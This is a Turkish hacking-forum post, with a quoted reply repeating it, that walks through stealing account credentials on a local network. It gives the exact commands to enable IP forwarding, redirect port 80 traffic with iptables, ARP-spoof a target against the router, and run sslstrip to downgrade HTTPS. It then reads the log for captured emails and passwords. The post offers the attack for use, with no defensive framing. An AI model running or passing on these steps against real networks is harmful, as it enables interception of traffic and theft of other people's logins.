Ağ Dinleme Yöntemi İle Hesap Çalma

HİÇ BİRYERDE GÖRMEDİM ÇOK SAĞLAM TAKTİK -=Stripped Content=- AMACIMIZ Arpspoofing saldırısı ile yerel ağdaki hedefin Arp tablosunu üzerimize alarak bütün trafiği dinlemek...

HİÇ BİRYERDE GÖRMEDİM ÇOK SAĞLAM TAKTİK


AMACIMIZ



Arpspoofing saldırısı ile yerel ağdaki hedefin Arp tablosunu üzerimize alarak bütün trafiği dinlemek ve hedefin bilgilerini ele geçirmek

ArpSpoof Nedir


Amacımız bölümünde bahsettiğim ağ dinleme işini yapacağımız dinleme yönetimidir

Sslstrip nedir

Normalde hedefin ağ trafiğini dinlerken https protokolünü kullanan sitelerde kullanıcı adı, şifre gibi bilgilerini göremeyiz. Sslstrip de hedefin girdiği https protokolünü kullanan domainleri http yaparak dinlemeye uygun hale getirir.

Kullanımı

İlk olarak kali linux üzerinden terminali açarak aşağıdaki komutu yazıyoruz

Kod:

echo 1 > /proc/sys/net/ipv4/ip_forward

Bu sayede ip yönlendirmesini sağlamış oluyoruz.


Daha sonra http trafiğinin sslstrip'in dinleme yapmış olduğu porta yönlendirmemiz gerekiyor. Bunun için terminale aşağıdaki kodu yazıyoruz.

Kod:

iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080



iptables = Linux üzerinde gelen firewall

-t nat = Nat olarak belirliyoruz

-A PREROUTING = Yönlendirme olduğunu belirliyoruz

-i eth0 = Ağ kartımızı seçiyoruz

-p tcp = Protokolü belirliyoruz

--destination-port 80 = Yönlendirilecek portu (hedefi) belirliyoruz

-j REDIRECT --to-port = Yönlenecek portu belirliyoruz ( Artık 80 portundan gelen verirler 8080 protuna yönlendirilecek)

Daha sonra hedef ip'den router'a Arp isteği göndereceğiz

Kod:

arpspoof -i eth0 -t hedefip(192.168.129.144) routerip(192.168.129.2)

Parantez içinde verdiğim ipler örnektir


Son olarak sslstrip'i araya sokuyoruz

Kod:

sslstrip -l 8080




Bu komutu girdiğinizde terminalde hedef giriş yaptığında loglar düşmeye başlayacaktir ve son işlemimizi yapma vaktimiz geldi semek olacaktır


Son olarak log dosyasını okuyarak bilgieri elde etmemiz gerekiyor. Log dosyasını aşağıdaki komutla açabiliriz.

Kod:

cat sslstrip.log

Bu komutu girdiğimizde logların arasında şu tarz bir şey çıkacaktır "email=[email protected] pass=123456" Buradaki email zaten bildiğiniz email adresi pass ise şifredir.
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
HİÇ BİRYERDE GÖRMEDİM ÇOK SAĞLAM TAKTİK
-=Stripped Content=-


AMACIMIZ



Arpspoofing saldırısı ile yerel ağdaki hedefin Arp tablosunu üzerimize alarak bütün trafiği dinlemek ve hedefin bilgilerini ele geçirmek

ArpSpoof Nedir


Amacımız bölümünde bahsettiğim ağ dinleme işini yapacağımız dinleme yönetimidir

Sslstrip nedir

Normalde hedefin ağ trafiğini dinlerken https protokolünü kullanan sitelerde kullanıcı adı, şifre gibi bilgilerini göremeyiz. Sslstrip de hedefin girdiği https protokolünü kullanan domainleri http yaparak dinlemeye uygun hale getirir.

Kullanımı

İlk olarak kali linux üzerinden terminali açarak aşağıdaki komutu yazıyoruz

Kod:

echo 1 > /proc/sys/net/ipv4/ip_forward

Bu sayede ip yönlendirmesini sağlamış oluyoruz.


Daha sonra http trafiğinin sslstrip'in dinleme yapmış olduğu porta yönlendirmemiz gerekiyor. Bunun için terminale aşağıdaki kodu yazıyoruz.

Kod:

iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080



iptables = Linux üzerinde gelen firewall

-t nat = Nat olarak belirliyoruz

-A PREROUTING = Yönlendirme olduğunu belirliyoruz

-i eth0 = Ağ kartımızı seçiyoruz

-p tcp = Protokolü belirliyoruz

--destination-port 80 = Yönlendirilecek portu (hedefi) belirliyoruz

-j REDIRECT --to-port = Yönlenecek portu belirliyoruz ( Artık 80 portundan gelen verirler 8080 protuna yönlendirilecek)

Daha sonra hedef ip'den router'a Arp isteği göndereceğiz

Kod:

arpspoof -i eth0 -t hedefip(192.168.129.144) routerip(192.168.129.2)

Parantez içinde verdiğim ipler örnektir


Son olarak sslstrip'i araya sokuyoruz

Kod:

sslstrip -l 8080




Bu komutu girdiğinizde terminalde hedef giriş yaptığında loglar düşmeye başlayacaktir ve son işlemimizi yapma vaktimiz geldi semek olacaktır


Son olarak log dosyasını okuyarak bilgieri elde etmemiz gerekiyor. Log dosyasını aşağıdaki komutla açabiliriz.

Kod:

cat sslstrip.log

Bu komutu girdiğimizde logların arasında şu tarz bir şey çıkacaktır "email=[email protected] pass=123456" Buradaki email zaten bildiğiniz email adresi pass ise şifredir.
eyw reis
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,833Konular
3,283,579Mesajlar
318,064Kullanıcılar
TechFusX2Son Üye
Üst Alt